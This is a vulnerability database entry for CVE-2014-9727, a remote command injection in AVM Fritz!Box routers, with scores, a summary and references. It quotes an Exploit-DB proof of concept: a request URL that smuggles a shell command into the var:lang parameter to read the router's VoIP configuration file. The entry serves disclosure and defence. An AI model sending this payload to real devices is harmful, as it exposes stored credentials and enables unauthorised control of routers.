Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
10
CVSSv2

CVE-2014-9727

Published: 29/05/2015 Updated: 07/11/2023
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Subscribe to Avm

Vulnerability Summary

AVM Fritz!Box allows remote malicious users to execute arbitrary commands via shell metacharacters in the var:lang parameter to cgi-bin/webcm.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

avm fritz\\!box

Exploits

Exploit DB: Fritz!Box - Remote Command Execution
App : Fritz!Box Author : 0x4148 Fritz!Box is Networking/voice Over ip router produced by AVM it suffer from Unauthenticated remote command execution flaw Poc : ip/cgi-bin/webcm?getpage=/html/menus/menu2html&var:lang=%26%20cat%20/var/flash/voipcfg%20%26 #0x4148_rise ...

References

CWE-78http://www.osvdb.org/103289http://www.exploit-db.com/exploits/33136https://www.trustwave.com/Resources/SpiderLabs-Blog/-Honeypot-Alert--Fritz%21Box-%E2%80%93-Remote-Command-Execution-Exploit-Attempt/https://nvd.nist.govhttps://www.exploit-db.com/exploits/33136/
CVSSv3
CVSSv2
CVSSv3
VMScore
Recommendations:
CVE-2024-34377CVE-2024-20859CVE-2023-49606injectarbitrary CVE-2024-33788CVE-2024-30973IDORCVE-2024-33907
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook